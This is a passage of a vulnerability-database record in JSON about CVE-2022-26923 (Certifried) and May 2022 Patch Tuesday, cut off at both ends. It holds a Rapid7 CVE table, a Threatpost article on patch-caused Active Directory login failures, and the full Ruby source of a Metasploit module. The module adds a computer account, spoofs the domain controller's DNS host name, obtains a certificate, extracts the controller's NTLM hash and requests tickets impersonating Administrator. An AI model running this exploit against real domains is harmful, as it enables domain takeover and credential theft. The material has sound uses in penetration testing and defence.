\n[CVE-2022-29113](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29113>) | Windows 
Digital Media Receiver Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-29134](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29134>) | Windows Clustered Shared Volume Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-29120](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29120>) | Windows Clustered Shared Volume Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-29122](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29122>) | Windows Clustered Shared Volume Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-29123](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29123>) | Windows Clustered Shared Volume Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-29138](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29138>) | Windows Clustered Shared Volume Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-29135](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29135>) | Windows Cluster Shared Volume (CSV) Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-29150](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29150>) | Windows Cluster Shared Volume (CSV) Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-29151](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29151>) | Windows Cluster Shared Volume (CSV) Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-26913](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26913>) | Windows Authentication Security Feature Bypass Vulnerability | No | No | 7.4 | Yes \n[CVE-2022-23279](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-23279>) | Windows ALPC Elevation of Privilege 
Vulnerability | No | No | 7 | Yes \n[CVE-2022-29126](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29126>) | Tablet Windows User Interface Application Core Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-26932](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26932>) | Storage Spaces Direct Elevation of Privilege Vulnerability | No | No | 8.2 | Yes \n[CVE-2022-26938](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26938>) | Storage Spaces Direct Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-26939](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26939>) | Storage Spaces Direct Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-26940](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26940>) | Remote Desktop Protocol Client Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-22017](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-22017>) | Remote Desktop Client Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-26923](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26923>) | Active Directory Domain Services Elevation of Privilege Vulnerability | No | No | 8.8 | Yes \n \n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T19:59:20", "type": "rapid7blog", "title": "Patch Tuesday - 
May 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21972", "CVE-2022-21978", "CVE-2022-22011", "CVE-2022-22012", "CVE-2022-22013", "CVE-2022-22014", "CVE-2022-22015", "CVE-2022-22016", "CVE-2022-22017", "CVE-2022-22019", "CVE-2022-22713", "CVE-2022-23267", "CVE-2022-23270", "CVE-2022-23279", "CVE-2022-24466", "CVE-2022-26913", "CVE-2022-26923", "CVE-2022-26925", "CVE-2022-26926", "CVE-2022-26927", "CVE-2022-26930", "CVE-2022-26931", "CVE-2022-26932", "CVE-2022-26933", "CVE-2022-26934", "CVE-2022-26935", "CVE-2022-26936", "CVE-2022-26937", "CVE-2022-26938", "CVE-2022-26939", "CVE-2022-26940", "CVE-2022-29102", "CVE-2022-29103", "CVE-2022-29104", "CVE-2022-29105", "CVE-2022-29106", "CVE-2022-29107", "CVE-2022-29108", "CVE-2022-29109", "CVE-2022-29110", "CVE-2022-29112", "CVE-2022-29113", "CVE-2022-29114", "CVE-2022-29115", "CVE-2022-29116", "CVE-2022-29117", "CVE-2022-29120", "CVE-2022-29121", "CVE-2022-29122", "CVE-2022-29123", "CVE-2022-29125", "CVE-2022-29126", "CVE-2022-29127", "CVE-2022-29128", "CVE-2022-29129", "CVE-2022-29130", "CVE-2022-29131", "CVE-2022-29132", "CVE-2022-29133", "CVE-2022-29134", "CVE-2022-29135", "CVE-2022-29137", "CVE-2022-29138", "CVE-2022-29139", "CVE-2022-29140", "CVE-2022-29141", "CVE-2022-29142", "CVE-2022-29145", "CVE-2022-29148", "CVE-2022-29150", "CVE-2022-29151", "CVE-2022-29972", "CVE-2022-30129", "CVE-2022-30130"], "modified": "2022-05-10T19:59:20", "id": "RAPID7BLOG:82692E307F294B32BDCAC4053EBE23B2", "href": 
"https://blog.rapid7.com/2022/05/10/patch-tuesday-may-2022/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2023-01-28T11:32:32", "description": "This module exploits a privilege escalation vulnerability in Active Directory Certificate Services (ADCS) to generate a valid certificate impersonating the Domain Controller (DC) computer account. This certificate is then used to authenticate to the target as the DC account using PKINIT preauthentication mechanism. The module will get and cache the Ticket-Granting-Ticket (TGT) for this account along with its NTLM hash. Finally, it requests a TGS impersonating a privileged user (Administrator by default). This TGS can then be used by other modules or external tools.\n", "cvss3": {}, "published": "2023-01-13T14:30:50", "type": "metasploit", "title": "Active Directory Certificate Services (ADCS) privilege escalation (Certifried)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-26923"], "modified": "2023-01-26T16:17:50", "id": "MSF:AUXILIARY-ADMIN-DCERPC-CVE_2022_26923_CERTIFRIED-", "href": "https://www.rapid7.com/db/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::SMB::Client::Authenticated\n alias connect_smb_client connect\n\n include Msf::Exploit::Remote::Kerberos::Client\n\n include Msf::Exploit::Remote::LDAP\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::MsIcpr\n include Msf::Exploit::Remote::MsSamr\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Active Directory Certificate Services (ADCS) privilege escalation (Certifried)',\n 'Description' => %q{\n This module exploits a privilege escalation vulnerability in Active\n Directory Certificate Services (ADCS) to generate a 
valid certificate\n impersonating the Domain Controller (DC) computer account. This\n certificate is then used to authenticate to the target as the DC\n account using PKINIT preauthentication mechanism. The module will get\n and cache the Ticket-Granting-Ticket (TGT) for this account along\n with its NTLM hash. Finally, it requests a TGS impersonating a\n privileged user (Administrator by default). This TGS can then be used\n by other modules or external tools.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Oliver Lyak', # Discovery\n 'CravateRouge', # bloodyAD implementation\n 'Erik Wynter', # MSF module\n 'Christophe De La Fuente' # MSF module\n ],\n 'References' => [\n ['URL', 'https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4'],\n ['URL', 'https://cravaterouge.github.io/ad/privesc/2022/05/11/bloodyad-and-CVE-2022-26923.html'],\n ['CVE', '2022-26923']\n ],\n 'Notes' => {\n 'AKA' => [ 'Certifried' ],\n 'Reliability' => [CRASH_SAFE],\n 'Stability' => [],\n 'SideEffects' => [ IOC_IN_LOGS ]\n },\n 'Actions' => [\n [ 'REQUEST_CERT', { 'Description' => 'Request a certificate with DNS host name matching the DC' } ],\n [ 'AUTHENTICATE', { 'Description' => 'Same as REQUEST_CERT but also authenticate' } ],\n [ 'PRIVESC', { 'Description' => 'Full privilege escalation attack' } ]\n ],\n 'DefaultAction' => 'PRIVESC',\n 'DefaultOptions' => {\n 'RPORT' => 445,\n 'SSL' => true,\n 'DOMAIN' => ''\n }\n )\n )\n\n register_options([\n # Using USERNAME, PASSWORD and DOMAIN options defined by the LDAP mixin\n OptString.new('DC_NAME', [ true, 'Name of the domain controller being targeted (must match RHOST)' ]),\n OptInt.new('LDAP_PORT', [true, 'LDAP port (default is 389 and default encrypted is 636)', 636]), # Set to 636 for legacy SSL\n OptString.new('DOMAIN', [true, 'The Fully Qualified Domain Name (FQDN). 
Ex: mydomain.local']),\n OptString.new('USERNAME', [true, 'The username to authenticate with']),\n OptString.new('PASSWORD', [true, 'The password to authenticate with']),\n OptString.new(\n 'SPN', [\n false,\n 'The Service Principal Name used to request an additional impersonated TGS, format is \"service_name/FQDN\" '\\\n '(e.g. \"ldap/dc01.mydomain.local\"). Note that, independently of this option, a TGS for \"cifs/<DC_NAME>.<DOMAIN>\"'\\\n ' will always be requested.',\n ],\n conditions: %w[ACTION == PRIVESC]\n ),\n OptString.new(\n 'IMPERSONATE', [\n true,\n 'The user on whose behalf a TGS is requested (it will use S4U2Self/S4U2Proxy to request the ticket)',\n 'Administrator'\n ],\n conditions: %w[ACTION == PRIVESC]\n )\n ])\n\n deregister_options('CERT_TEMPLATE', 'ALT_DNS', 'ALT_UPN', 'PFX', 'ON_BEHALF_OF', 'SMBUser', 'SMBPass', 'SMBDomain')\n end\n\n def run\n @privesc_success = false\n @computer_created = false\n\n opts = {}\n validate_options\n unless can_add_computer?\n fail_with(Failure::NoAccess, 'Machine account quota is zero, this user cannot create a computer account')\n end\n\n opts[:tree] = connect_smb\n computer_info = add_computer(opts)\n @computer_created = true\n disconnect_smb(opts.delete(:tree))\n\n impersonate_dc(computer_info.name)\n\n opts = {\n username: computer_info.name,\n password: computer_info.password\n }\n opts[:tree] = connect_smb(opts)\n opts[:cert_template] = 'Machine'\n cert = request_certificate(opts)\n fail_with(Failure::UnexpectedReply, 'Unable to request the certificate.') unless cert\n\n if ['AUTHENTICATE', 'PRIVESC'].include?(action.name)\n credential, key = get_tgt(cert)\n fail_with(Failure::UnexpectedReply, 'Unable to request the TGT.') unless credential && key\n\n get_ntlm_hash(credential, key)\n end\n\n if action.name == 'PRIVESC'\n # Always request a TGS for `cifs/...` SPN, since we need it to properly delete the computer account\n default_spn = \"cifs/#{datastore['DC_NAME']}.#{datastore['DOMAIN']}\"\n 
request_ticket(credential, default_spn)\n @privesc_success = true\n\n # If requested, get an additional TGS\n if datastore['SPN'].present? && datastore['SPN'].casecmp(default_spn) != 0\n begin\n request_ticket(credential, datastore['SPN'])\n rescue Rex::Proto::Kerberos::Model::Error::KerberosError => e\n print_error(\"Unable to get the additional TGS for #{datastore['SPN']}: #{e.message}\")\n end\n end\n end\n rescue MsSamrConnectionError, MsIcprConnectionError => e\n fail_with(Failure::Unreachable, e.message)\n rescue MsSamrAuthenticationError, MsIcprAuthenticationError => e\n fail_with(Failure::NoAccess, e.message)\n rescue MsSamrNotFoundError, MsIcprNotFoundError => e\n fail_with(Failure::NotFound, e.message)\n rescue MsSamrBadConfigError => e\n fail_with(Failure::BadConfig, e.message)\n rescue MsSamrUnexpectedReplyError, MsIcprUnexpectedReplyError => e\n fail_with(Failure::UnexpectedReply, e.message)\n rescue MsSamrUnknownError, MsIcprUnknownError => e\n fail_with(Failure::Unknown, e.message)\n rescue Rex::Proto::Kerberos::Model::Error::KerberosError => e\n fail_with(Failure::Unknown, e.message)\n ensure\n if @computer_created\n print_status(\"Deleting the computer account #{computer_info&.name}\")\n disconnect_smb(opts.delete(:tree)) if opts[:tree]\n if @privesc_success\n # If the privilege escalation succeeded, let'use the cached TGS\n # impersonating the admin to delete the computer account\n datastore['SMB::Auth'] = Msf::Exploit::Remote::AuthOption::KERBEROS\n datastore['Smb::Rhostname'] = \"#{datastore['DC_NAME']}.#{datastore['DOMAIN']}\"\n datastore['SMBDomain'] = datastore['DOMAIN']\n datastore['DomainControllerRhost'] = rhost\n tree = connect_smb(username: datastore['IMPERSONATE'])\n else\n tree = connect_smb\n end\n opts = {\n tree: tree,\n computer_name: computer_info&.name\n }\n begin\n delete_computer(opts) if opts[:tree] && opts[:computer_name]\n rescue MsSamrUnknownError => e\n print_warning(\"Unable to delete the computer account, this will have 
to be done manually with an Administrator account (#{e.message})\")\n end\n disconnect_smb(opts.delete(:tree)) if opts[:tree]\n end\n end\n\n def validate_options\n if datastore['USERNAME'].blank?\n fail_with(Failure::BadConfig, 'USERNAME not set')\n end\n if datastore['PASSWORD'].blank?\n fail_with(Failure::BadConfig, 'PASSWORD not set')\n end\n if datastore['DOMAIN'].blank?\n fail_with(Failure::BadConfig, 'DOMAIN not set')\n end\n unless datastore['DOMAIN'].match(/.+\\..+/)\n fail_with(Failure::BadConfig, 'DOMAIN format must be FQDN (ex: mydomain.local)')\n end\n if datastore['CA'].blank?\n fail_with(Failure::BadConfig, 'CA not set')\n end\n if datastore['DC_NAME'].blank?\n fail_with(Failure::BadConfig, 'DC_NAME not set')\n end\n if datastore['SPN'].present? && !datastore['SPN'].match(%r{.+/.+\\..+\\..+})\n fail_with(Failure::BadConfig, 'SPN format must be <service_name>/<hostname>.<FQDN> (ex: cifs/dc01.mydomain.local)')\n end\n end\n\n def connect_smb(opts = {})\n username = opts[:username] || datastore['USERNAME']\n password = opts[:password] || datastore['PASSWORD']\n domain = opts[:domain] || datastore['DOMAIN']\n datastore['SMBUser'] = username\n datastore['SMBPass'] = password\n datastore['SMBDomain'] = domain\n\n if datastore['SMB::Auth'] == Msf::Exploit::Remote::AuthOption::KERBEROS\n vprint_status(\"Connecting SMB with #{username}.#{domain} using Kerberos authentication\")\n else\n vprint_status(\"Connecting SMB with #{username}.#{domain}:#{password}\")\n end\n begin\n connect_smb_client\n rescue Rex::ConnectionError, RubySMB::Error::RubySMBError => e\n fail_with(Failure::Unreachable, e.message)\n end\n\n begin\n smb_login\n rescue Rex::Proto::SMB::Exceptions::Error, RubySMB::Error::RubySMBError => e\n fail_with(Failure::NoAccess, \"Unable to authenticate ([#{e.class}] #{e})\")\n end\n report_service(\n host: rhost,\n port: rport,\n host_name: simple.client.default_name,\n proto: 'tcp',\n name: 'smb',\n info: \"Module: #{fullname}, last negotiated 
version: SMBv#{simple.client.negotiated_smb_version} (dialect = #{simple.client.dialect})\"\n )\n\n begin\n simple.client.tree_connect(\"\\\\\\\\#{sock.peerhost}\\\\IPC$\")\n rescue RubySMB::Error::RubySMBError => e\n fail_with(Failure::Unreachable, \"Unable to connect to the remote IPC$ share ([#{e.class}] #{e})\")\n end\n end\n\n def disconnect_smb(tree)\n vprint_status('Disconnecting SMB')\n tree.disconnect! if tree\n simple.client.disconnect!\n rescue RubySMB::Error::RubySMBError => e\n print_warning(\"Unable to disconnect SMB ([#{e.class}] #{e})\")\n end\n\n def can_add_computer?\n vprint_status('Requesting the ms-DS-MachineAccountQuota value to see if we can add any computer accounts...')\n\n quota = nil\n begin\n ldap_open do |ldap|\n ldap_options = {\n filter: Net::LDAP::Filter.eq('objectclass', 'domainDNS'),\n attributes: 'ms-DS-MachineAccountQuota',\n return_result: false\n }\n ldap.search(ldap_options) do |entry|\n quota = entry['ms-ds-machineaccountquota']&.first&.to_i\n end\n end\n rescue Net::LDAP::Error => e\n print_error(\"LDAP error: #{e.class}: #{e.message}\")\n end\n\n if quota.blank?\n print_warning('Received no result when trying to obtain ms-DS-MachineAccountQuota. 
Adding a computer account may not work.')\n return true\n end\n\n vprint_status(\"ms-DS-MachineAccountQuota = #{quota}\")\n quota > 0\n end\n\n def print_ldap_error(ldap)\n opres = ldap.get_operation_result\n msg = \"LDAP error #{opres.code}: #{opres.message}\"\n unless opres.error_message.to_s.empty?\n msg += \" - #{opres.error_message}\"\n end\n print_error(\"#{peer} #{msg}\")\n end\n\n def ldap_open\n ldap_peer = \"#{rhost}:#{datastore['LDAP_PORT']}\"\n base = datastore['DOMAIN'].split('.').map { |dc| \"dc=#{dc}\" }.join(',')\n ldap_options = {\n port: datastore['LDAP_PORT'],\n base: base\n }\n\n ldap_connect(ldap_options) do |ldap|\n if ldap.get_operation_result.code != 0\n print_ldap_error(ldap)\n break\n end\n print_good(\"Successfully authenticated to LDAP (#{ldap_peer})\")\n yield ldap\n end\n end\n\n def get_dnshostname(ldap, c_name)\n dnshostname = nil\n filter1 = Net::LDAP::Filter.eq('Name', c_name.delete_suffix('$'))\n filter2 = Net::LDAP::Filter.eq('objectclass', 'computer')\n joined_filter = Net::LDAP::Filter.join(filter1, filter2)\n ldap_options = {\n filter: joined_filter,\n attributes: 'DNSHostname',\n return_result: false\n\n }\n ldap.search(ldap_options) do |entry|\n dnshostname = entry[:dnshostname]&.first\n end\n vprint_status(\"Retrieved original DNSHostame #{dnshostname} for #{c_name}\") if dnshostname\n dnshostname\n end\n\n def impersonate_dc(computer_name)\n ldap_open do |ldap|\n dc_dnshostname = get_dnshostname(ldap, datastore['DC_NAME'])\n print_status(\"Attempting to set the DNS hostname for the computer #{computer_name} to the DNS hostname for the DC: #{datastore['DC_NAME']}\")\n domain_to_ldif = datastore['DOMAIN'].split('.').map { |dc| \"dc=#{dc}\" }.join(',')\n computer_dn = \"cn=#{computer_name.delete_suffix('$')},cn=computers,#{domain_to_ldif}\"\n ldap.modify(dn: computer_dn, operations: [[ :add, :dnsHostName, dc_dnshostname ]])\n new_computer_hostname = get_dnshostname(ldap, computer_name)\n if new_computer_hostname != 
dc_dnshostname\n fail_with(Failure::Unknown, 'Failed to change the DNS hostname')\n end\n print_good('Successfully changed the DNS hostname')\n end\n rescue Net::LDAP::Error => e\n print_error(\"LDAP error: #{e.class}: #{e.message}\")\n end\n\n def get_tgt(cert)\n dc_name = datastore['DC_NAME'].dup.downcase\n dc_name += '$' unless dc_name.ends_with?('$')\n username, realm = extract_user_and_realm(cert.certificate, dc_name, datastore['DOMAIN'])\n print_status(\"Attempting PKINIT login for #{username}@#{realm}\")\n begin\n server_name = \"krbtgt/#{realm}\"\n tgt_result = send_request_tgt_pkinit(\n pfx: cert,\n client_name: username,\n realm: realm,\n server_name: server_name,\n rport: 88\n )\n print_good('Successfully authenticated with certificate')\n\n report_service(\n host: rhost,\n port: rport,\n name: 'Kerberos-PKINIT',\n proto: 'tcp',\n info: \"Module: #{fullname}, Realm: #{realm}\"\n )\n\n ccache = Rex::Proto::Kerberos::CredentialCache::Krb5Ccache.from_responses(tgt_result.as_rep, tgt_result.decrypted_part)\n Msf::Exploit::Remote::Kerberos::Ticket::Storage.store_ccache(ccache, host: rhost, framework_module: self)\n\n [ccache.credentials.first, tgt_result.krb_enc_key[:key]]\n rescue Rex::Proto::Kerberos::Model::Error::KerberosError => e\n case e.error_code\n when Rex::Proto::Kerberos::Model::Error::ErrorCodes::KDC_ERR_CERTIFICATE_MISMATCH\n print_error(\"Failed: #{e.message}, Target system is likely not vulnerable to Certifried\")\n else\n print_error(\"Failed: #{e.message}\")\n end\n nil\n end\n end\n\n def get_ntlm_hash(credential, key)\n dc_name = datastore['DC_NAME'].dup.downcase\n dc_name += '$' unless dc_name.ends_with?('$')\n print_status(\"Trying to retrieve NT hash for #{dc_name}\")\n\n realm = datastore['DOMAIN'].downcase\n\n authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base.new(\n host: rhost,\n realm: realm,\n username: dc_name,\n framework: framework,\n framework_module: self\n )\n tgs_ticket, _tgs_auth = 
authenticator.u2uself(credential)\n\n session_key = Rex::Proto::Kerberos::Model::EncryptionKey.new(\n type: credential.keyblock.enctype.value,\n value: credential.keyblock.data.value\n )\n ticket_enc_part = Rex::Proto::Kerberos::Model::TicketEncPart.decode(\n tgs_ticket.enc_part.decrypt_asn1(session_key.value, Rex::Proto::Kerberos::Crypto::KeyUsage::KDC_REP_TICKET)\n )\n value = OpenSSL::ASN1.decode(ticket_enc_part.authorization_data.elements[0][:data]).value[0].value[1].value[0].value\n pac = Rex::Proto::Kerberos::Pac::Krb5Pac.read(value)\n pac_info_buffer = pac.pac_info_buffers.find do |buffer|\n buffer.ul_type == Rex::Proto::Kerberos::Pac::Krb5PacElementType::CREDENTIAL_INFORMATION\n end\n unless pac_info_buffer\n print_error('NTLM hash not found in PAC')\n return\n end\n\n serialized_pac_credential_data = pac_info_buffer.buffer.pac_element.decrypt_serialized_data(key)\n ntlm_hash = serialized_pac_credential_data.data.extract_ntlm_hash\n print_good(\"Found NTLM hash for #{dc_name}: #{ntlm_hash}\")\n report_ntlm(realm, dc_name, ntlm_hash)\n end\n\n def report_ntlm(domain, user, hash)\n jtr_format = Metasploit::Framework::Hashes.identify_hash(hash)\n service_data = {\n address: rhost,\n port: rport,\n service_name: 'smb',\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n credential_data = {\n module_fullname: fullname,\n origin_type: :service,\n private_data: hash,\n private_type: :ntlm_hash,\n jtr_format: jtr_format,\n username: user,\n realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,\n realm_value: domain\n }.merge(service_data)\n\n credential_core = create_credential(credential_data)\n\n login_data = {\n core: credential_core,\n status: Metasploit::Model::Login::Status::UNTRIED\n }.merge(service_data)\n\n create_credential_login(login_data)\n end\n\n def request_ticket(credential, spn)\n print_status(\"Getting TGS impersonating #{datastore['IMPERSONATE']}@#{datastore['DOMAIN']} (SPN: #{spn})\")\n\n dc_name = 
datastore['DC_NAME'].dup.downcase\n dc_name += '$' if !dc_name.ends_with?('$')\n\n options = {\n host: rhost,\n realm: datastore['DOMAIN'],\n username: dc_name,\n framework: framework,\n framework_module: self\n }\n\n authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base.new(**options)\n\n sname = Rex::Proto::Kerberos::Model::PrincipalName.new(\n name_type: Rex::Proto::Kerberos::Model::NameType::NT_SRV_INST,\n name_string: spn.split('/')\n )\n auth_options = {\n sname: sname,\n impersonate: datastore['IMPERSONATE']\n }\n authenticator.s4u2self(credential, auth_options)\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "threatpost": [{"lastseen": "2022-05-19T00:06:33", "description": "Microsoft is alerting customers that its May [Patch Tuesday update](<https://docs.microsoft.com/en-us/windows/release-health/status-windows-11-21h2#2826msgdesc>) is causing authentication errors and failures tied to Windows Active Directory Domain Services. In a Friday update, Microsoft said it was investigating the issue.\n\nThe warning comes amid [shared reports](<https://www.reddit.com/r/sysadmin/comments/um9qur/patch_tuesday_megathread_20220510/i85p2ll/?context=3>) of multiple services and policies failing after installing the security update. \u201cAuthentication failed due to a user credentials mismatch. 
Either the user name provided does not map to an existing account or the password was incorrect.\u201d posted an admin to a Reddit thread on the topic.\n\nAccording to Microsoft, the issue has been caused after installing the updates released on May 10, 2022.\n\n\u201cAfter installing updates released May 10, 2022 on your domain controllers, you might see authentication failures on the server or client for services such as [Network Policy Server (NPS)](<https://docs.microsoft.com/en-us/windows-server/networking/technologies/nps/nps-top>), [Routing and Remote access Service (RRAS)](<https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn614140\\(v=ws.11\\)>), [Radius](<https://docs.microsoft.com/en-us/windows/win32/nps/ias-radius-authentication-and-accounting>), [Extensible Authentication Protocol (EAP)](<https://docs.microsoft.com/en-us/windows-server/networking/technologies/extensible-authentication-protocol/network-access>), and [Protected Extensible Authentication Protocol (PEAP)](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-peap/a128a089-0919-41a5-a0c2-9f25ef28289d>),\u201d Microsoft reported.\n\n\u201cAn issue has been found related to how the mapping of certificates to machine accounts is being handled by the domain controller,\u201d Microsoft added.\n\nThe domain controller is a server that is responsible for responding to authentication requests as well as verifying the user on a computer network, and the active directory is a type of directory service that stores the information about objects on a network and makes this information readily available for the users.\n\nMicrosoft added a note that the update will not affect the client\u2019s Windows devices and non-domain controller windows servers, and will only cause issues for the server acting as a domain controller.\n\n\u201cInstallation of updates released May 10, 2022, on client Windows devices and non-domain controller Windows Servers 
will not cause this issue. This issue only affects installation of May 10, 2022, updates installed on servers used as domain controllers.\u201d Microsoft explains.\n\n## **Authentication Failure Caused by Security Update**\n\n[Microsoft released another document](<https://support.microsoft.com/en-us/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16#bkmk_compatmode>), explaining further details related to the authentication problem caused by the security update addressing the privilege escalation vulnerabilities in Windows Kerberos and Active Directory Domain Services.\n\nThe vulnerabilities are tracked as [CVE-2022-26931](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-26931>) in Windows Kerberos with a high severity CVSS rating of 7.5 and [CVE-2022-26923](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26923>) (discovered by security researcher [Oliver Lyak](<https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4>)) in Microsoft\u2019s Active Directory Domain Services. It has a CVSS score of 8.8 and is rated as high. 
If left unpatched, an attacker can exploit the vulnerability to escalate privileges to those of a [domain admin](<https://twitter.com/wdormann/status/1524446644942647299>).\n\n## **Workarounds**\n\nMicrosoft advises domain administrators to [manually map](<https://support.microsoft.com/en-us/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16#bkmk_certmap>) the certificates to a user in Active Directory until the official updates are available.\n\n\u201cDomain administrators can manually map certificates to a user in Active Directory using the altSecurityIdentities attribute of the user\u2019s Object,\u201d Microsoft added.\n\n\u201cIf the preferred mitigation will not work in your environment, please see [\u2018KB5014754](<https://support.microsoft.com/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16>)\u2014Certificate-based authentication changes on Windows domain controllers\u2019 for other possible mitigations in the SChannel registry key section,\u201d reported by Microsoft.\n\nAccording to Microsoft, any other mitigation method might not provide adequate security hardening.\n\nAccording to Microsoft, the May 2022 update allows all authentication attempts unless the certificate is older than the user; this is because the updates automatically set the StrongCertificateBindingEnforcement registry key, \u201cwhich changes the enforcement mode of the KDC to Disabled Mode, Compatibility Mode, or Full Enforcement Mode\u201d Microsoft explains.\n\nOne Windows admin who spoke to _BleepingComputer_ said that the only way they were able to get some users to log in after installing the patch was to disable the StrongCertificateBindingEnforcement key by setting its value to 0.\n\nBy changing the REG_DWORD DataType value to 0, the admin can disable the strong certificate mapping check and can 
create the key from scratch. This method is not recommended by Microsoft, but it\u2019s the only way to allow all users to log in.\n\nMicrosoft is investigating the issues and a fix should be available soon.\n\nMicrosoft also recently released [73 new patches](<https://threatpost.com/microsoft-zero-day-mays-patch-tuesday/179579/>) as part of May\u2019s monthly update of security fixes.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-16T11:46:39", "type": "threatpost", "title": "Microsoft\u2019s May Patch Tuesday Updates Cause Windows AD Authentication Errors", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26923", "CVE-2022-26931"], "modified": "2022-05-16T11:46:39", "id": "THREATPOST:FFC96438DF87C2B7A1ABFD101EBC298C", "href": "https://threatpost.com/microsofts-may-patch-tuesday-updates-cause-windows-ad-authentication-errors/179631/", "cvss": {"score": 9.0, 